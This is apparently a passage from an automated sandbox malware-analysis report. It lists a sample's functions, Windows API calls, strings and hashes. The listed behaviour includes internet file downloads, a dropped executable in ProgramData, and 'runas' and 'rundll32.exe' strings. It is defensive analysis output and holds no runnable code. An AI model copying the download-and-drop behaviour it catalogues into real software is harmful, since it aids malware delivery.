                                                                                                                                              • Part of subcall function 0040DED0: Concurrency::cancel_current_task.LIBCPMT ref: 0040DFF1
                                                                                                                                            • CreateThread.KERNEL32(00000000,00000000,004026A0,00000000,00000000,00000000), ref: 00402776
                                                                                                                                            • Sleep.KERNEL32(000007D0,?,?,?,?,?,?,?,?,?,?), ref: 00402783
                                                                                                                                            • SuspendThread.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?), ref: 0040278A
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000005.00000002.709283272.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                            • Associated: 00000005.00000002.709336987.0000000000433000.00000040.00020000.sdmp Download File
                                                                                                                                            Similarity
                                                                                                                                            • API ID: Thread$Concurrency::cancel_current_taskCreateSleepSuspend
                                                                                                                                            • String ID: runas$rundll32.exe
                                                                                                                                            • API String ID: 1039963361-4081450877
                                                                                                                                            • Opcode ID: 632079711821d43c6ffd94068d311285de1374bb21d42eded8444c8ed2936e06
                                                                                                                                            • Instruction ID: 09392b5254e1645925be96854df3bf802cc6077f604ac9a376f359c2fefabc37
                                                                                                                                            • Opcode Fuzzy Hash: 632079711821d43c6ffd94068d311285de1374bb21d42eded8444c8ed2936e06
                                                                                                                                            • Instruction Fuzzy Hash: BF41E631210148ABEB18DF28CE89B8D3B66AF45305F94863AF909A72D1C77DD4C08B98
                                                                                                                                            Uniqueness

                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                            Function 0211A5A8, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 83COMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            Strings
                                                                                                                                            • C:\ProgramData\M7WCJ84VE5TXJ0R4.exe, xrefs: 0211A5AD
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000005.00000002.709954448.0000000002100000.00000040.00000001.sdmp, Offset: 02100000, based on PE: false
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID: C:\ProgramData\M7WCJ84VE5TXJ0R4.exe
                                                                                                                                            • API String ID: 0-2322989060
                                                                                                                                            • Opcode ID: f3947822aba8bb08784cc91c87d2ab758d579a1d2d6cee65828d2ade4eac22e4
                                                                                                                                            • Instruction ID: 3729e305706b1fbd1e323ae338cb18473f9b41a400a207d72232b8c067e30212
                                                                                                                                            • Opcode Fuzzy Hash: f3947822aba8bb08784cc91c87d2ab758d579a1d2d6cee65828d2ade4eac22e4
                                                                                                                                            • Instruction Fuzzy Hash: 3E21C371685215BFDB24AF658C80D6BBFAEEF003647114635F92997250E731EC40CBA0
                                                                                                                                            Uniqueness

                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                            Function 0041A358, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 83COMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            Strings
                                                                                                                                            • C:\ProgramData\M7WCJ84VE5TXJ0R4.exe, xrefs: 0041A35D
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000005.00000002.709283272.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                            • Associated: 00000005.00000002.709336987.0000000000433000.00000040.00020000.sdmp Download File
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID: C:\ProgramData\M7WCJ84VE5TXJ0R4.exe
                                                                                                                                            • API String ID: 0-2322989060
                                                                                                                                            • Opcode ID: 8ca4ff4ee348ea15c208bf2ad728796eb86287263020c82ad8f8fe69cf35f3be
                                                                                                                                            • Instruction ID: 8fcd5dcc9f5b01b07bd52fb12ed5abbccf50734b0b3ace7a73ab30f581ed808c
                                                                                                                                            • Opcode Fuzzy Hash: 8ca4ff4ee348ea15c208bf2ad728796eb86287263020c82ad8f8fe69cf35f3be
                                                                                                                                            • Instruction Fuzzy Hash: 6121C5712012157FDB20AF728C849EB77ACEF00368710462AF929C7251E778ECE1C76A
                                                                                                                                            Uniqueness

                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                            Function 00411ACB, Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 74COMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            APIs
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000005.00000002.709283272.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                            • Associated: 00000005.00000002.709336987.0000000000433000.00000040.00020000.sdmp Download File
                                                                                                                                            Similarity
                                                                                                                                            • API ID: _wcsrchr
                                                                                                                                            • String ID: .bat$.cmd$.com$.exe
                                                                                                                                            • API String ID: 1752292252-4019086052
                                                                                                                                            • Opcode ID: 43bfc6addb4ef82b3eba14085431bb7548137eca9168f827e0cbc0b6f077e910
                                                                                                                                            • Instruction ID: 58063f8b226cf6e6d1833e63b29625ed4d015e7c9e48810328c3890537844d72
                                                                                                                                            • Opcode Fuzzy Hash: 43bfc6addb4ef82b3eba14085431bb7548137eca9168f827e0cbc0b6f077e910
                                                                                                                                            • Instruction Fuzzy Hash: 49012F37B18237231A141219AC02BAB57998F91BB8727402FFA54F72C0FD5DEC82419C
                                                                                                                                            Uniqueness

                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                            Function 00410014, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 68COMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000005.00000002.709283272.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                            • Associated: 00000005.00000002.709336987.0000000000433000.00000040.00020000.sdmp Download File
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID: api-ms-
                                                                                                                                            • API String ID: 0-2084034818
                                                                                                                                            • Opcode ID: 549e127746ad6c7bd3ee20d666b9d2ccda9dade7604bf89d19fa89fb802e33e3
                                                                                                                                            • Instruction ID: 0d93d73468b09f87d9ef7135dd4aa8ebd36ada29da4d791985ae1a3ae0162fcd
                                                                                                                                            • Opcode Fuzzy Hash: 549e127746ad6c7bd3ee20d666b9d2ccda9dade7604bf89d19fa89fb802e33e3
                                                                                                                                            • Instruction Fuzzy Hash: EC11BC31B01225EBDB324B24FC44BAB7BA4AF49760B110122ED45A7350D6B4DDC186DD
                                                                                                                                            Uniqueness

                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                            Function 004165FC, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 44COMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            APIs
                                                                                                                                            • GetFullPathNameW.KERNEL32(?,?,00000000,00000000,agA,00000000,?,0041D0C5,00000000,00000000,?,?,00000000,00000000,00000001,00000000), ref: 00416612
                                                                                                                                            • GetLastError.KERNEL32(?,0041D0C5,00000000,00000000,?,?,00000000,00000000,00000001,00000000,00000000,?,00416761,00000000,00000104,?), ref: 0041661C
                                                                                                                                            • __dosmaperr.LIBCMT ref: 00416623
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000005.00000002.709283272.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                            • Associated: 00000005.00000002.709336987.0000000000433000.00000040.00020000.sdmp Download File
                                                                                                                                            Similarity
                                                                                                                                            • API ID: ErrorFullLastNamePath__dosmaperr
                                                                                                                                            • String ID: agA
                                                                                                                                            • API String ID: 2398240785-2637427811
                                                                                                                                            • Opcode ID: 750d90e04018309d6e3ce2e80e93ff16eb5e1b86fb368af3d40798a4c1480b2f
                                                                                                                                            • Instruction ID: fe48760646ffff483df900e44d367c1fcd9bf12732390f7954c1140dc131ea13
                                                                                                                                            • Opcode Fuzzy Hash: 750d90e04018309d6e3ce2e80e93ff16eb5e1b86fb368af3d40798a4c1480b2f
                                                                                                                                            • Instruction Fuzzy Hash: D2F03132200115BB8B215BA6DC0899BFF6DFF453A03168526F51DC7521D736E8A2DBD8
                                                                                                                                            Uniqueness

                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                            Function 00416665, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 44COMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            APIs
                                                                                                                                            • GetFullPathNameW.KERNEL32(?,?,00000000,00000000,agA,00000000,?,0041D050,00000000,00000000,agA,?,?,00000000,00000000,00000001), ref: 0041667B
                                                                                                                                            • GetLastError.KERNEL32(?,0041D050,00000000,00000000,agA,?,?,00000000,00000000,00000001,00000000,00000000,?,00416761,00000000,00000104), ref: 00416685
                                                                                                                                            • __dosmaperr.LIBCMT ref: 0041668C
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000005.00000002.709283272.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                            • Associated: 00000005.00000002.709336987.0000000000433000.00000040.00020000.sdmp Download File
                                                                                                                                            Similarity
                                                                                                                                            • API ID: ErrorFullLastNamePath__dosmaperr
                                                                                                                                            • String ID: agA
                                                                                                                                            • API String ID: 2398240785-2637427811
                                                                                                                                            • Opcode ID: 7d495383b710f1faf093cc59933ccc85a4bded580e77670141baabca898ebb25
                                                                                                                                            • Instruction ID: 1982b7d424c97b4da265894f81eacb40b146a14d7fee0b0cb49c55dd075f62aa
                                                                                                                                            • Opcode Fuzzy Hash: 7d495383b710f1faf093cc59933ccc85a4bded580e77670141baabca898ebb25
                                                                                                                                            • Instruction Fuzzy Hash: EBF06231200515BBCB201F62CC04997FF69FF453A43124516F51DC7620C735E8A1DBD8
                                                                                                                                            Uniqueness

                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                            Function 004110C3, Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 30libraryloaderCOMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            APIs
                                                                                                                                            • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,004110B8,?,?,00411080,?,?,?), ref: 004110D8
                                                                                                                                            • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 004110EB
                                                                                                                                            • FreeLibrary.KERNEL32(00000000,?,?,004110B8,?,?,00411080,?,?,?), ref: 0041110E
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000005.00000002.709283272.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                            • Associated: 00000005.00000002.709336987.0000000000433000.00000040.00020000.sdmp Download File
                                                                                                                                            Similarity
                                                                                                                                            • API ID: AddressFreeHandleLibraryModuleProc
                                                                                                                                            • String ID: CorExitProcess$mscoree.dll
                                                                                                                                            • API String ID: 4061214504-1276376045
                                                                                                                                            • Opcode ID: b37e2a0355cf052c7e7e456c1e71d6e36bed1f43a61ca4eb637a0100914bca8f
                                                                                                                                            • Instruction ID: 89d1d6a6511906fb8b10b3cdba021d603bd2b1b5d6d269f4ed68b4bcbc4a5649
                                                                                                                                            • Opcode Fuzzy Hash: b37e2a0355cf052c7e7e456c1e71d6e36bed1f43a61ca4eb637a0100914bca8f
                                                                                                                                            • Instruction Fuzzy Hash: 94F0A730B00228FBCB21DB60EC09BDFBA78EF04756F520075FA00A1160DB758E01EB98
                                                                                                                                            Uniqueness

                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                            Function 004146E1, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 19COMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            APIs
                                                                                                                                            • _free.LIBCMT ref: 004146EA
                                                                                                                                              • Part of subcall function 004154C1: HeapFree.KERNEL32(00000000,00000000,?,004145A3), ref: 004154D7
                                                                                                                                              • Part of subcall function 004154C1: GetLastError.KERNEL32(?,?,004145A3), ref: 004154E9
                                                                                                                                            • _free.LIBCMT ref: 004146FD
                                                                                                                                            • _free.LIBCMT ref: 0041470E
                                                                                                                                            • _free.LIBCMT ref: 0041471F
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000005.00000002.709283272.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                            • Associated: 00000005.00000002.709336987.0000000000433000.00000040.00020000.sdmp Download File
                                                                                                                                            Similarity
                                                                                                                                            • API ID: _free$ErrorFreeHeapLast
                                                                                                                                            • String ID: Fg
                                                                                                                                            • API String ID: 776569668-2445576420
                                                                                                                                            • Opcode ID: ed6feafc550fa1065a8e86d3c97a65e9d970199be6f8b94e087475161f8d8b19
                                                                                                                                            • Instruction ID: c745ba60f97e2d4d87b6af78ea720ad5864cbd823f739a73dd20a150a1001671
                                                                                                                                            • Opcode Fuzzy Hash: ed6feafc550fa1065a8e86d3c97a65e9d970199be6f8b94e087475161f8d8b19
                                                                                                                                            • Instruction Fuzzy Hash: F9E09A75600624EB8B216F16FC419863A71FBC47153C2913AF81452231CB3905DB9FCD
                                                                                                                                            Uniqueness

                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                            Function 0211D881, Relevance: 7.9, APIs: 5, Instructions: 373timeCOMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            APIs
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000005.00000002.709954448.0000000002100000.00000040.00000001.sdmp, Offset: 02100000, based on PE: false
                                                                                                                                            Similarity
                                                                                                                                            • API ID: _free$InformationTimeZone
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 597776487-0
                                                                                                                                            • Opcode ID: 43ee30c7ba166d1e1025ba4d1c2ab3c94bbe7b0064d6f6931672a8035e95404c
                                                                                                                                            • Instruction ID: b20b64d6fded706ef42164d28f451ff75889228289345a3f692526ce7ef5c861
                                                                                                                                            • Opcode Fuzzy Hash: 43ee30c7ba166d1e1025ba4d1c2ab3c94bbe7b0064d6f6931672a8035e95404c
                                                                                                                                            • Instruction Fuzzy Hash: 14C17E71A842089FDB34DF78FC81BAA7BBAAF46314F5440B9D491D7284E7309A06CB54
                                                                                                                                            Uniqueness

                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                            Function 0041D631, Relevance: 7.9, APIs: 5, Instructions: 373timeCOMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            APIs
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000005.00000002.709283272.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                            • Associated: 00000005.00000002.709336987.0000000000433000.00000040.00020000.sdmp Download File
                                                                                                                                            Similarity
                                                                                                                                            • API ID: _free$InformationTimeZone
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 597776487-0
                                                                                                                                            • Opcode ID: c0b8a7c97969d7c5eb60b99d6337e65cf2ef3ec59db1456ebf4d8e0fd80c8fd4
                                                                                                                                            • Instruction ID: 288546b534604ff02d250860d8c74b002ea5c89fcf63bb1af3282de747a45e08
                                                                                                                                            • Opcode Fuzzy Hash: c0b8a7c97969d7c5eb60b99d6337e65cf2ef3ec59db1456ebf4d8e0fd80c8fd4
                                                                                                                                            • Instruction Fuzzy Hash: B0C127F1E00204ABCB24AF79C841BEA7BB9AF45314F5440BBE4A597381E7388DC6C758
                                                                                                                                            Uniqueness

                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                            Function 02104750, Relevance: 7.9, APIs: 5, Instructions: 365COMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            APIs
                                                                                                                                            • GetModuleFileNameW.KERNEL32(00000000,?,00000104,?,?,?), ref: 0210476D
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000005.00000002.709954448.0000000002100000.00000040.00000001.sdmp, Offset: 02100000, based on PE: false
                                                                                                                                            Similarity
                                                                                                                                            • API ID: FileModuleName
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 514040917-0
                                                                                                                                            • Opcode ID: dc50723a56f45cdb93892fc7a004fc4a6fb4df015874c5bffbec08402badaeea
                                                                                                                                            • Instruction ID: e5e551ac5c30b6d3601d93a915297069672576ad16aadcf8590d5653a963e3dd
                                                                                                                                            • Opcode Fuzzy Hash: dc50723a56f45cdb93892fc7a004fc4a6fb4df015874c5bffbec08402badaeea
                                                                                                                                            • Instruction Fuzzy Hash: B0C1AF74E00108AFDB14EFA8DCC4BEEB7BAEF48304F504169E515A7284DBB56A45CFA1
                                                                                                                                            Uniqueness

                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                            Function 02105FF0, Relevance: 7.8, APIs: 5, Instructions: 256networkCOMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            APIs
                                                                                                                                            • InternetOpenW.WININET(0042BD4C,00000000,00000000,00000000,00000000), ref: 0210601C
                                                                                                                                            • InternetConnectA.WININET(00000000,?,00000050,00000000,00000000,00000003,00000000,00000001), ref: 0210603E
                                                                                                                                            • HttpOpenRequestA.WININET(00000000,00000000,?,00000000,00000000,00000000,00000000,00000001), ref: 02106083
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000005.00000002.709954448.0000000002100000.00000040.00000001.sdmp, Offset: 02100000, based on PE: false
                                                                                                                                            Similarity
                                                                                                                                            • API ID: InternetOpen$ConnectHttpRequest
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 3864186401-0
                                                                                                                                            • Opcode ID: 45cb08c31b478048f33621fc6a013a7d7f9cda989f4ce6104b72d7460009519a
                                                                                                                                            • Instruction ID: 06acf4f95387a0b541e699601bde1d986ecb333c38f5860dcf94aca49f6258d2
                                                                                                                                            • Opcode Fuzzy Hash: 45cb08c31b478048f33621fc6a013a7d7f9cda989f4ce6104b72d7460009519a
                                                                                                                                            • Instruction Fuzzy Hash: 25910730A40208AFEB14EFA4CC99BEE7B7AEF45304F504558E800672C6DBB59A95CFD1
                                                                                                                                            Uniqueness

                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                            Function 02111A53, Relevance: 7.6, APIs: 5, Instructions: 141pipeCOMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            APIs
                                                                                                                                            • GetFileType.KERNEL32(?,?,00000000,00000000,?,?,?,?,?,?,?,?,?,?,?,02111985), ref: 02111A75
                                                                                                                                            • GetFileInformationByHandle.KERNEL32(?,?), ref: 02111ACF
                                                                                                                                            • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,02111985,?,000000FF,00000000,00000000), ref: 02111B5D
                                                                                                                                            • __dosmaperr.LIBCMT ref: 02111B64
                                                                                                                                            • PeekNamedPipe.KERNEL32(?,00000000,00000000,00000000,?,00000000), ref: 02111BA1
                                                                                                                                              • Part of subcall function 02111DC9: __dosmaperr.LIBCMT ref: 02111DFE
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000005.00000002.709954448.0000000002100000.00000040.00000001.sdmp, Offset: 02100000, based on PE: false
                                                                                                                                            Similarity
                                                                                                                                            • API ID: File__dosmaperr$ErrorHandleInformationLastNamedPeekPipeType
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 1206951868-0
                                                                                                                                            • Opcode ID: a23d261a52b5f9b846104edee53f27537c0404e818dce516698b2e32cd5f43d1
                                                                                                                                            • Instruction ID: 92e6dd6fcaed820f66a953bfbeadc36a1b31a8f153ff9b86ed3829883cb2a8e5
                                                                                                                                            • Opcode Fuzzy Hash: a23d261a52b5f9b846104edee53f27537c0404e818dce516698b2e32cd5f43d1
                                                                                                                                            • Instruction Fuzzy Hash: A9413A75940208AFDB34DFA9DC45AAFFBF9EF89300B10492DE95AD3610E7309945CB24
                                                                                                                                            Uniqueness

                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                            Function 00411803, Relevance: 7.6, APIs: 5, Instructions: 141pipeCOMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            APIs
                                                                                                                                            • GetFileType.KERNEL32(?,?,00000000,00000000,?,?,?,?,?,?,?,?,?,?,?,00411735), ref: 00411825
                                                                                                                                            • GetFileInformationByHandle.KERNEL32(?,?), ref: 0041187F
                                                                                                                                            • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,00411735,?,000000FF,00000000,00000000), ref: 0041190D
                                                                                                                                            • __dosmaperr.LIBCMT ref: 00411914
                                                                                                                                            • PeekNamedPipe.KERNEL32(?,00000000,00000000,00000000,?,00000000), ref: 00411951
                                                                                                                                              • Part of subcall function 00411B79: __dosmaperr.LIBCMT ref: 00411BAE
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000005.00000002.709283272.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                            • Associated: 00000005.00000002.709336987.0000000000433000.00000040.00020000.sdmp Download File
                                                                                                                                            Similarity
                                                                                                                                            • API ID: File__dosmaperr$ErrorHandleInformationLastNamedPeekPipeType
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 1206951868-0
                                                                                                                                            • Opcode ID: 16e295c4d619405f19a85019e968ffd2d4bfecc0b5273f9f5da4f21c7d868b2d
                                                                                                                                            • Instruction ID: d274835a22ada6365d67a3fd31ba40142e4e5efe742fd0fdd0ace425437cd848
                                                                                                                                            • Opcode Fuzzy Hash: 16e295c4d619405f19a85019e968ffd2d4bfecc0b5273f9f5da4f21c7d868b2d
                                                                                                                                            • Instruction Fuzzy Hash: 0A416FB5910208AFCB24DFA5DC559EFBBF9EF88300700442EF956D3220E6349985CB24
                                                                                                                                            Uniqueness

                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                            Function 00405C1B, Relevance: 7.6, APIs: 5, Instructions: 140networkfileCOMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            APIs
                                                                                                                                            • WriteFile.KERNEL32(?,?,?,?,00000000), ref: 00405C37
                                                                                                                                            • InternetReadFile.WININET(?,?,?,?), ref: 00405C48
                                                                                                                                            • CloseHandle.KERNEL32(00000000), ref: 00405C53
                                                                                                                                            • InternetCloseHandle.WININET(?), ref: 00405C62
                                                                                                                                            • InternetCloseHandle.WININET(00000000), ref: 00405C65
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000005.00000002.709283272.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                            • Associated: 00000005.00000002.709336987.0000000000433000.00000040.00020000.sdmp Download File
                                                                                                                                            Similarity
                                                                                                                                            • API ID: CloseHandleInternet$File$ReadWrite
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 567989605-0
                                                                                                                                            • Opcode ID: 4db9166f19b28e5f5a92ae287efffe36d319b50f9564bf802e3a71a26fc2c97e
                                                                                                                                            • Instruction ID: a7605270fcd12d8c15781ecc61888e93a28614b2ee53878b883e1b5fc184c049
                                                                                                                                            • Opcode Fuzzy Hash: 4db9166f19b28e5f5a92ae287efffe36d319b50f9564bf802e3a71a26fc2c97e
                                                                                                                                            • Instruction Fuzzy Hash: 6C41B371A00108ABEF14DF64DD85AEE7769EF44314F54463AF809B32D1D639EA84CF58
                                                                                                                                            Uniqueness

                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                            Function 02105DE0, Relevance: 7.6, APIs: 5, Instructions: 105networkfileCOMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            APIs
                                                                                                                                            • CreateFileA.KERNEL32(?,40000000,00000000,00000000,00000002,00000080,00000000), ref: 02105E15
                                                                                                                                            • InternetOpenA.WININET(0042BC85,00000000,00000000,00000000,00000000), ref: 02105E2A
                                                                                                                                            • InternetOpenUrlA.WININET(00000000,?,00000000,00000000,00000000,00000000), ref: 02105E4A
                                                                                                                                            • InternetReadFile.WININET(00000000,?,00010000,00010000), ref: 02105E61
                                                                                                                                            • CloseHandle.KERNEL32(00000000), ref: 02105EA3
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000005.00000002.709954448.0000000002100000.00000040.00000001.sdmp, Offset: 02100000, based on PE: false
                                                                                                                                            Similarity
                                                                                                                                            • API ID: Internet$FileOpen$CloseCreateHandleRead
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 2307989922-0
                                                                                                                                            • Opcode ID: ce1beb23994ba6cfe60ad75172c2035a9ced062f96f421e070562818efa0cf88
                                                                                                                                            • Instruction ID: 45b01acf7774031fedfde7f3cba373c67c7ce80f4c30a7afaad42c22d3747287
                                                                                                                                            • Opcode Fuzzy Hash: ce1beb23994ba6cfe60ad75172c2035a9ced062f96f421e070562818efa0cf88
                                                                                                                                            • Instruction Fuzzy Hash: A331A731340208BFEB20CF64CC85FED376AEB48704FA04529FA44962C1C7B9E9818F54
                                                                                                                                            Uniqueness

                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                            Function 0211B916, Relevance: 7.5, APIs: 5, Instructions: 40COMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            APIs
                                                                                                                                            • _free.LIBCMT ref: 0211B92E
                                                                                                                                              • Part of subcall function 02115711: HeapFree.KERNEL32(00000000,00000000,?,021147F3), ref: 02115727
                                                                                                                                              • Part of subcall function 02115711: GetLastError.KERNEL32(?,?,021147F3), ref: 02115739
                                                                                                                                            • _free.LIBCMT ref: 0211B940
                                                                                                                                            • _free.LIBCMT ref: 0211B952
                                                                                                                                            • _free.LIBCMT ref: 0211B964
                                                                                                                                            • _free.LIBCMT ref: 0211B976
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000005.00000002.709954448.0000000002100000.00000040.00000001.sdmp, Offset: 02100000, based on PE: false
                                                                                                                                            Similarity
                                                                                                                                            • API ID: _free$ErrorFreeHeapLast
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 776569668-0
                                                                                                                                            • Opcode ID: 2e475136816e74a22205f3a21d403dd6562cb687a52a92f297be36c8a022ea00
                                                                                                                                            • Instruction ID: c15373dda52ae4ca0d066c610e787b383b0ad6a87104aa86ada13a223f145754
                                                                                                                                            • Opcode Fuzzy Hash: 2e475136816e74a22205f3a21d403dd6562cb687a52a92f297be36c8a022ea00
                                                                                                                                            • Instruction Fuzzy Hash: 24F09672688244FB8630FF69F8C5C1673EBAE443583E50839F048DB514CB34F8828E64
                                                                                                                                            Uniqueness

                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                            Function 0041B6C6, Relevance: 7.5, APIs: 5, Instructions: 40COMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            APIs
                                                                                                                                            • _free.LIBCMT ref: 0041B6DE
                                                                                                                                              • Part of subcall function 004154C1: HeapFree.KERNEL32(00000000,00000000,?,004145A3), ref: 004154D7
                                                                                                                                              • Part of subcall function 004154C1: GetLastError.KERNEL32(?,?,004145A3), ref: 004154E9
                                                                                                                                            • _free.LIBCMT ref: 0041B6F0
                                                                                                                                            • _free.LIBCMT ref: 0041B702
                                                                                                                                            • _free.LIBCMT ref: 0041B714
                                                                                                                                            • _free.LIBCMT ref: 0041B726
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000005.00000002.709283272.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                            • Associated: 00000005.00000002.709336987.0000000000433000.00000040.00020000.sdmp Download File
                                                                                                                                            Similarity
                                                                                                                                            • API ID: _free$ErrorFreeHeapLast
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 776569668-0
                                                                                                                                            • Opcode ID: 2e475136816e74a22205f3a21d403dd6562cb687a52a92f297be36c8a022ea00
                                                                                                                                            • Instruction ID: a39dbec80042cf7ab2af5a54609ca5fcb94fb6c3dd62ab813c31dfe5020b408c
                                                                                                                                            • Opcode Fuzzy Hash: 2e475136816e74a22205f3a21d403dd6562cb687a52a92f297be36c8a022ea00
                                                                                                                                            • Instruction Fuzzy Hash: 66F04F32600610A78620FB66F8C5DDB77E9EA84351794580BF098D7642CB38FCC186AC
                                                                                                                                            Uniqueness

                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                            Function 02119FE3, Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 206COMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            APIs
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000005.00000002.709954448.0000000002100000.00000040.00000001.sdmp, Offset: 02100000, based on PE: false
                                                                                                                                            Similarity
                                                                                                                                            • API ID: _free
                                                                                                                                            • String ID: *?
                                                                                                                                            • API String ID: 269201875-2564092906
                                                                                                                                            • Opcode ID: 0a53196b252b46736e61d4d1bcca109f78a400bdedf12c68fddac8ae25f72c85
                                                                                                                                            • Instruction ID: 3b7c34fae5f0d844b5410b5896c04c7a7cc288f5aa6987a284565c1180b83567
                                                                                                                                            • Opcode Fuzzy Hash: 0a53196b252b46736e61d4d1bcca109f78a400bdedf12c68fddac8ae25f72c85
                                                                                                                                            • Instruction Fuzzy Hash: 27613BB5E40219AFDB14CFA8C8809EDFBF6EF48310B25816AE815E7300D775AE41CB90
                                                                                                                                            Uniqueness

                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                            Function 00419D93, Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 206COMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            APIs
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000005.00000002.709283272.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                            • Associated: 00000005.00000002.709336987.0000000000433000.00000040.00020000.sdmp Download File
                                                                                                                                            Similarity
                                                                                                                                            • API ID: _free
                                                                                                                                            • String ID: *?
                                                                                                                                            • API String ID: 269201875-2564092906
                                                                                                                                            • Opcode ID: a7ea2927210ddaaeaf889bde27f001d99d629c740ddb3fa362963e888c4f8377
